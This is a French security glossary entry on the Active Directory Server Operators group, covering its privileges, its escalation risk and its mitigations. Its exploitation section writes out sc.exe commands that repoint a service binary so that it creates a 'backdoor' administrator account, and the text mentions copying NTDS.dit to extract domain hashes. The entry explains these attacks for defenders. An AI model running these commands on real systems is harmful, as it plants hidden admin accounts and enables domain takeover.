Aller au contenu principal
Expert Cybersécurité & IAv9.0
Centres de ressources conformité
Besoin d'un accompagnement expert ?
Devis personnalisé sous 24h — audit, conformité, incident
Checklists Sécurité — Audit & Durcissement
Formats disponibles
📄 PDF 📊 Excel 🌐 Web

11 checklists professionnelles couvrant 2 200+ points de contrôle. Téléchargement gratuit, aucune inscription.

Server Operators Group

ad

Définition

Server Operators est un groupe intégré (built-in) d'Active Directory, présent exclusivement sur les contrôleurs de domaine, dont les membres disposent de droits d'administration étendus sur ces serveurs sans pour autant appartenir à Domain Admins : démarrage et arrêt de services, sauvegarde et restauration de fichiers via les privilèges SeBackupPrivilege et SeRestorePrivilege, connexion locale interactive, et surtout arrêt à distance du système via le privilège SeRemoteShutdownPrivilege. La combinaison des privilèges SeBackupPrivilege et SeRestorePrivilege constitue, comme pour le groupe Backup Operators, un vecteur d'escalade de privilèges critique : un membre de Server Operators peut copier le fichier NTDS.dit via une copie de volume shadow ou restaurer un fichier arbitraire à un emplacement sensible du système, contournant les protections NTFS classiques et ouvrant la voie à une extraction complète des hashes du domaine. Ce groupe, historiquement conçu pour une délégation opérationnelle sur les serveurs sans octroi de privilèges d'administration de domaine complets, est aujourd'hui unanimement considéré par les référentiels de sécurité, dont le guide ANSSI, comme équivalent en pratique à une appartenance à Domain Admins compte tenu de sa capacité effective à compromettre l'intégrité des contrôleurs de domaine. Les audits de sécurité Active Directory recommandent systématiquement de vider ce groupe et de lui substituer des délégations d'administration granulaires strictement limitées aux besoins opérationnels réels.

Droits accordés aux Server Operators

  • SeInteractiveLogonRight sur les DC (login console)
  • SeBackupPrivilege et SeRestorePrivilege
  • SeShutdownPrivilege (arrêter les DC)
  • Modifier les services Windows (sc.exe config + start/stop)

Exploitation via modification de service

  • sc.exe qc VulnService → vérifier binpath
  • sc.exe config VulnService binPath= "cmd.exe /k net user backdoor Password123 /add && net localgroup administrators backdoor /add"
  • net stop/start VulnService → code malveillant exécuté en SYSTEM

Mitigation

  • Maintenir Server Operators vide sur les DC de production
  • Surveiller les modifications de services sur les DC (Event ID 7045, 7040)

Articles liés

Un projet cybersécurité ?

Expert dispo · Réponse 24h

Devis